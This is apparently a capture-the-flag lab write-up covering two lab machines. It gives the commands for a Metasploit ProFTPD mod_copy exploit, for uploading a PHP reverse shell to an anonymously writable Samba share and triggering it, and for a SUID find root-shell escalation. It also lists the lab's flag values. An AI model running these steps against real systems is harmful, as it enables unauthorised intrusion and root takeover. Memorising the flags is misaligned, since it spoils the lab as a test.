Penetration Testing Exploitation CTF 3

Overview¶

This lab focuses on identifying and exploiting vulnerabilities across two target machines (target1.ine.local and target2.ine.local). By uncovering weaknesses in services and configurations, we retrieve flags from various locations. Tasks include:

Flag 1: Exploit a vulnerable service on target1 to retrieve a flag from the root directory.
Flag 2: Interact with a local network service on target1 using a hint from Flag 1.
Flag 3: Exploit a misconfigured service on target2 to gain access and retrieve a flag.
Flag 4: Escalate privileges to root on target2 and read the flag from /root.

Flag 1: Exploiting ProFTPD 1.3.5 on `target1`¶

Step 1: Enumeration¶

Nmap Scan reveals:
FTP (21): ProFTPD 1.3.5 (vulnerable to mod_copy RCE).
HTTP (80): Apache 2.4.41 (Ubuntu).

nmap -p- --min-rate=10000 target1.ine.local

Step 2: Exploitation¶

Searchsploit confirms ProFTPD 1.3.5 is exploitable via mod_copy:
```
searchsploit ProFTPD 1.3.5
```

Metasploit Module:

use exploit/unix/ftp/proftpd_modcopy_exec
set RHOSTS target1.ine.local
set SITEPATH /var/www/html  # From Apache default page
exploit

Upgrade to Meterpreter:
```
sessions -u <session_id>
```

Step 3: Retrieve Flag¶

Navigate to / and read flag1.txt:
```
cat /flag1.txt
```

Flag 1

d783277df68b4b6ab274beed476496f7

Flag 2: Local Service Interaction on `target1`¶

Step 1: Analyze Hint¶

Flag 1’s hint:

"Remember, the magical word is 'letmein'"

Step 2: Discover Local Service¶

Check listening ports:
```
netstat -lntu
```
Port 8888 is open locally.

Step 3: Interact with Service¶

Use netcat to connect and provide the passphrase (letmein):
```
nc localhost 8888
```
Enter letmein to receive Flag 2.

Flag 2

e2c598d0f53242ec86d6482db68e325b

Flag 3: Exploiting Samba Misconfiguration on `target2`¶

Step 1: Enumeration¶

Nmap Scan reveals:
HTTP (80): Apache 2.4.41.
SMB (139/445): Samba 4.6.2.
SMB Shares:
```
smbclient -L //target2.ine.local
```
Accessible share: site-uploads (anonymous write allowed).

Step 2: Upload PHP Shell¶

Upload a reverse shell (pentestmonkey.php) via SMB:

smbclient -N //target2.ine.local/site-uploads
put shell.php

Trigger the shell via HTTP:

curl http://target2.ine.local/shell.php

Step 3: Retrieve Flag¶

After gaining a shell (www-data), read flag3.txt in /:
```
cat /flag3.txt
```

Flag 3

6b0baffdd3f948cfb26259df3adec80a

Flag 4: Privilege Escalation to Root on `target2`¶

Step 1: Check SUID Binaries¶

Find binaries with SUID bit set:
```
find / -perm /4000 -type f 2>/dev/null
```
/usr/bin/find is exploitable.

Step 2: Exploit `find` SUID¶

Use GTFOBins technique to spawn a root shell:
```
find . -exec /bin/bash -p \; -quit
```
Verify privileges:
```
whoami  # root
```

Step 3: Retrieve Flag¶

Access /root/flag4.txt:
```
cat /root/flag4.txt
```

Flag 4

ea93d2c1cfb9461b8712505b0c33a63c

Penetration Testing Exploitation CTF 3

Overview¶

Flag 1: Exploiting ProFTPD 1.3.5 on target1¶

Step 1: Enumeration¶

Step 2: Exploitation¶

Step 3: Retrieve Flag¶

Flag 2: Local Service Interaction on target1¶

Step 1: Analyze Hint¶

Step 2: Discover Local Service¶

Step 3: Interact with Service¶

Flag 3: Exploiting Samba Misconfiguration on target2¶

Step 1: Enumeration¶

Step 2: Upload PHP Shell¶

Step 3: Retrieve Flag¶

Flag 4: Privilege Escalation to Root on target2¶

Step 1: Check SUID Binaries¶

Step 2: Exploit find SUID¶

Step 3: Retrieve Flag¶

Flag 1: Exploiting ProFTPD 1.3.5 on `target1`¶

Flag 2: Local Service Interaction on `target1`¶

Flag 3: Exploiting Samba Misconfiguration on `target2`¶

Flag 4: Privilege Escalation to Root on `target2`¶

Step 2: Exploit `find` SUID¶